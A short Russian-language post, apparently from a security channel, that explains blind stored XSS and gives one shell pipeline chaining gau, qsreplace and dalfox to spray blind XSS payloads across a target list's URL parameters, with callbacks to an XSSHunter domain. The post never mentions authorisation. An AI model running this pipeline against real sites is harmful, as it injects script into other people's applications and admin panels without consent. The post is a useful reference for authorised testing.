​​🖇 Находим Blind XSS на сайте одной командой



В качестве дополнения к этому посту стоит упомянуть про слепой XSS. Слепой XSS (Blind XSS) - это тип хранимых XSS, в котором ввод злоумышленников сохраняется в базе данных и отражается в совершенно другом месте или приложении, используемом системным администратором/членом команды.



Таким образом, злоумышленник слепо разворачивает серию вредоносных полезных нагрузок на веб-страницах, не зная никаких подробностей о полезных нагрузках, где они хранятся в базе данных или на какой веб-странице они выполняются.



Есть несколько фреймворков, созданных специально для Blind XSS. Мы будем использовать XSSHunter. Необходимо пройти регистрацию и получить специальный короткий домен xss.ht, такой как shadow.xss.ht. Этот домен будет встраиваться в полезную нагрузку и в случае успеха, на сайте будет отображаться информация о сработавшей слепой XSS.



Мы будем использовать уже знакомые подписчикам канала инструменты, а именно gau - для получения URL адресов, qsreplace - для подстановки полезной нагрузки, а также dalfox для эксплуатации. Вместо shadow.xss.ht используйте свою ссылку.



cat target_list| gau | egrep -o "http?.*" | grep "="| egrep -v ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | qsreplace -a | dalfox pipe --blind shadow.xss.ht -o result.txt



P.S. Не забывайте, что это только пример. При желании, вы можете расширить его как вам угодно, например, использовать совместно с gau и другие инструменты, тем самым получив больше конечных точек для эксплуатации.



#web #xss